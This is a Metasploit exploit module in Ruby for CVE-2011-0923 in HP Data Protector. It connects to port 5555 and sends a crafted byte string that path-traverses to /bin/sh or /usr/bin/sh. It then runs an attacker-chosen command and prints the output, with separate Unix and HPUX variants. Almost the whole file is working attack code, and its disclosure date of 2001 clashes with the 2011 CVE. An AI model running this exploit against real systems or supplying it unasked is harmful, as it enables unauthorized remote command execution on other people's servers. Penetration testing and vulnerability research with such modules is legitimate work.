##
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
        Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Command Execution on HP Dataprotector',
			'Description'    => %q{
						This module exploits the vulnerability in HP Dataprotector
						to execute the command.
					},
			'Author'         =>
					[
						'SZ',		# original exploit discovery
						'Sohil Garg' 	# ported to metasploit
					],
			'License'        => MSF_LICENSE,
			'References'     =>
				[
					['CVE', '2011-0923'],
					#['OSVDB', 'NA'],
					['URL', 'http://www.exploit-db.com/exploits/17648/'],
				],
			'Platform'       => ['unix'], # win
			'Arch'           => ARCH_CMD,
			'Privileged'     => false,
			'Targets'        =>
				[
					[ 'Unix', { }],
					[ 'HPUX', { }],
				],

			'Payload'        =>
				{
					'Space'       => 1024,
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl telnet',
						}
				},
			'DisclosureDate' => 'Feb 28 2001'))

		register_options(
			[
				Opt::RPORT(5555)
			], self.class)
	end

	def exploit

			connect
			print_status("Connected to #{rhost}:#{rport}...")
			if (target.name =~ /Unix/)
			# Shell code from http://www.exploit-db.com/exploits/17648/
			# Ascii conversion of shell code
			# shcode1 =
			# ""+
			# "\x00\x00\x00\xa4\x20"+"2"+"\x00\x20"+"--ch0ks-"+
			# "\x00\x20\x00"+"0"+"\x20"+"SYSTEM"+"\x00\x20"+"-ch0ks--"+"\x00\x20"+"C"+"\x00\x20"+"20"+"\x00\x20"+
			# "--ch0ks-"+"\x00\x20"+"Poc"+"\x00\x20"+"-r00t-r00t-"+
			# "\x00\x20"+"-r00t-r00t-"+"\x00\x20"+"-r00t-r00t-"+"\x00\x20\x00"+"0"+"\x20\x00"+
			# "0"+"\x20"+"../../../../../../../../../bin/sh"+
			# "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
			# "\x00\x00\x00\x00\x00\x00\x00\x00\x00"
			shcode = ""
			shcode << "\x00\x00\x00\xa4\x20\x32\x00\x20\x2d\x2d\x63\x68\x30\x6b\x73\x2d"
			shcode << "\x00\x20\x30\x00\x20\x53\x59\x53\x54\x45\x4d\x00\x20\x2d\x63\x68"
			shcode << "\x30\x6b\x73\x2d\x2d\x00\x20\x43\x00\x20\x32\x30\x00\x20\x2d\x2d"
			shcode << "\x63\x68\x30\x6b\x73\x2d\x00\x20\x50\x6f\x63\x00\x20\x2d\x72\x30"
			shcode << "\x30\x74\x2d\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d"
			shcode << "\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d\x72\x30\x30"
			shcode << "\x74\x2d\x00\x20\x30\x00\x20\x30\x00\x20\x2e\x2e\x2f\x2e\x2e\x2f"
			shcode << "\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e"
			shcode << "\x2e\x2f\x2e\x2e\x2f\x62\x69\x6e\x2f\x73\x68\x00\x00\x00\x00\x00"
			shcode << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
			shcode << "\x00\x00\x00\x00\x00\x00\x00\x00\x00"
			end
			if (target.name =~ /HPUX/)
			#Shell code from http://www.exploit-db.com/exploits/17614/
			shcode = ""
			shcode << "\x00\x00\x00\xa4\x20\x32\x00\x20\x2d\x2d\x63\x68\x30\x6b\x73\x2d"
			shcode << "\x00\x20\x30\x00\x20\x53\x59\x53\x54\x45\x4d\x00\x20\x2d\x63\x68"
			shcode << "\x30\x6b\x73\x2d\x2d\x00\x20\x43\x00\x20\x32\x30\x00\x20\x2d\x2d"
			shcode << "\x63\x68\x30\x6b\x73\x2d\x00\x20\x50\x6f\x63\x00\x20\x2d\x72\x30"
			shcode << "\x30\x74\x2d\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d"
			shcode << "\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d\x72\x30\x30"
			shcode << "\x74\x2d\x00\x20\x30\x00\x20\x30\x00\x20\x2e\x2e\x2f\x2e\x2e\x2f"
			shcode << "\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e"
			shcode << "\x2e\x2f\x2e\x2e\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x68\x00"
			shcode << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
			shcode << "\x00\x00\x00\x00\x00\x00\x00\x00\x00"
			end
			sock.put(shcode + payload.encoded + ";\n")
			res = sock.get_once(-1, 5)
			print("Command Output:"+"\n"+"#{res}")

			handler
			disconnect
	end
end

=begin
pull request #169
=end
